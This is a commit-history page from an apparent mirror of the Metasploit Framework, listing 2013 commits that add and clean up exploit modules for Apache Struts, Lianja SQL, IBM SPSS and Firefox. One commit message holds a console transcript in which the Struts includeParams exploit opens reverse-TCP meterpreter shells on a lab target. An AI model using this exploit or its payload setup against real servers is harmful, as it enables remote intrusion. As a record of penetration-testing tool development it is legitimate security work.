adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
55,054 Commits 27 Branches 1,043 Tags
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
Commit Graph

13654 Commits

Author SHA1 Message Date
jvazquez-r7 5939ca8ce4 Add analysis at the end of the module 2013-06-01 15:59:17 -05:00
jvazquez-r7 9be8971bb0 Add module for ZDI-13-094 2013-06-01 15:44:01 -05:00
Steve Tornio 8671ae9de7 add osvdb ref 2013-06-01 14:27:50 -05:00
Steve Tornio 80f1e98952 added osvdb refs 2013-06-01 07:04:43 -05:00
jvazquez-r7 d42ac02e3e Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-31 23:01:05 -05:00
jvazquez-r7 f8e9535c39 Add ZDI reference 2013-05-31 20:50:53 -05:00
jvazquez-r7 3a360caba1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-31 19:03:21 -05:00
sinn3r 90117c322c Landing #1874 - Post API cleanup 2013-05-31 16:15:23 -05:00
James Lee 4f6d80c813 Land #1804, user-settable filename for psexec 2013-05-31 13:34:52 -05:00
James Lee 5964d36c40 Fix a syntax error 
Also uses a prettier syntax for setting the filename (ternary operators
are hard to read).
 2013-05-31 13:31:36 -05:00
jvazquez-r7 48b14c09e3 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-31 01:12:46 -05:00
jvazquez-r7 146a30ec4d Do minor cleanup for struts_include_params 2013-05-31 01:01:15 -05:00
jvazquez-r7 a7a754ae1f Land #1870, @Console exploit for Struts includeParams injection 2013-05-31 00:59:33 -05:00
jvazquez-r7 70037fdbed Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-30 15:02:34 -05:00
jvazquez-r7 d0489b5d1e Delete some commas 2013-05-30 14:25:53 -05:00
jvazquez-r7 6abb591428 Do minor cleanup for lianja_db_net 2013-05-30 14:25:05 -05:00
jvazquez-r7 38e5c2bed2 Land #1877, @zeroSteiner's exploit for Lianja SQL 2013-05-30 14:23:45 -05:00
Console eb4162d41b boolean issue fix 2013-05-30 18:15:33 +01:00
Console 5fa8ecd334 removed magic number 109 
now calculated from the actual length of all static URL elements
 2013-05-30 17:40:43 +01:00
Spencer McIntyre 70e1379338 Use msvcrt in ropdb for stability. 2013-05-30 11:13:22 -04:00
Console 47524a0570 converted request params to hash merge operation 2013-05-30 15:36:01 +01:00
Console 51879ab9c7 removed unnecessary lines 2013-05-30 15:15:10 +01:00
Console abb0ab12f6 Fix msftidy compliance 2013-05-30 13:10:24 +01:00
Console 5233ac4cbd Progress bar instead of message spam. 2013-05-30 13:08:43 +01:00
Console fb388c6463 Chunk length is now "huge" for POST method 
minor changes to option text and changed HTTPMETHOD to an enum.
 2013-05-30 11:30:24 +01:00
Console ab6a2a049b Fix issue with JAVA meterpreter failing to work. 
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
 2013-05-30 10:35:29 +01:00
Console d70526f4cc Renamed as per suggestion 2013-05-30 09:29:26 +01:00
jvazquez-r7 1d0c4151b7 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-29 15:29:26 -05:00
Tod Beardsley e7a1f06fbc Modules shouldn't be +x 2013-05-29 15:11:35 -05:00
Console 7c38324b76 Considered using the bourne stager. 
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
 2013-05-29 14:21:23 +01:00
Spencer McIntyre c3ab1ed2a5 Exploit module for Lianja SQL 1.0.0RC5.1 2013-05-29 08:48:41 -04:00
Console ec315ad50d Modified URI handling to make use of target_uri and vars_get/post. 
Added support for both GET and POST methods as both are vulnerable to
this exploit.
 2013-05-29 12:56:34 +01:00
Console b39531cea6 Added references 2013-05-28 23:15:10 +01:00
James Lee f3ff5b5205 Factorize and remove includes 
Speeds up compilation and removes dependency on bionic source
 2013-05-28 15:46:06 -05:00
jvazquez-r7 66ea59b03f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-28 15:22:46 -05:00
Console 7b43117d87 Added RCE for Struts versions earlier than 2.3.14.2 
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
 2013-05-28 18:26:57 +01:00
James Lee 9843dc4cb4 Land #1708, android meterpreter 
Conflicts:
	data/meterpreter/ext_server_stdapi.jar
 2013-05-28 12:19:45 -05:00
sinn3r d16d316658 Fixes mssql_findandsampledata & ms11_006_creat esizeddibsection 
[FixRM:7987]
[FixRM:7986]
 2013-05-28 11:15:17 -05:00
sinn3r 73aa14cb91 Landing #1868 - IBM SPSS SamplePower 3.0 module (CVE-2012-5946) 2013-05-28 11:02:21 -05:00
Tod Beardsley 75d6c8079a Spelling, whitespace 
Please be sure to run msftidy.rb on new modules. Thanks!
 2013-05-28 10:03:37 -05:00
jvazquez-r7 e678b2c5d8 Add module for CVE-2012-5946 2013-05-26 00:21:20 -05:00
darknight007 57b7e4ec44 Update ms11_006_createsizeddibsection.rb 2013-05-25 13:14:41 +06:00
jvazquez-r7 d5cf6c1fbc Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-23 12:37:54 -05:00
sinn3r 81ad280107 Landing #1856 - CVE-2013-0758 Firefox <= 17.0.1 + Flash RCE 
Chained exploit using CVE-2013-0758 and CVE-2013-0757
 2013-05-23 12:21:10 -05:00
sinn3r 67861794f6 Fix automatic payload selection 2013-05-22 22:37:18 -05:00
jvazquez-r7 23bc11c7e0 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-22 15:15:58 -05:00
sinn3r 23fe3146dc Extra print_status I don't want 2013-05-22 14:38:30 -05:00
jvazquez-r7 bfcd86022d Add code cleanup for nginx_chunked_size. 2013-05-22 14:37:42 -05:00
sinn3r 0e6576747a Fix target selection probs, and swf path 2013-05-22 14:34:00 -05:00
jvazquez-r7 0dee5ae94d Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-22 12:54:44 -05:00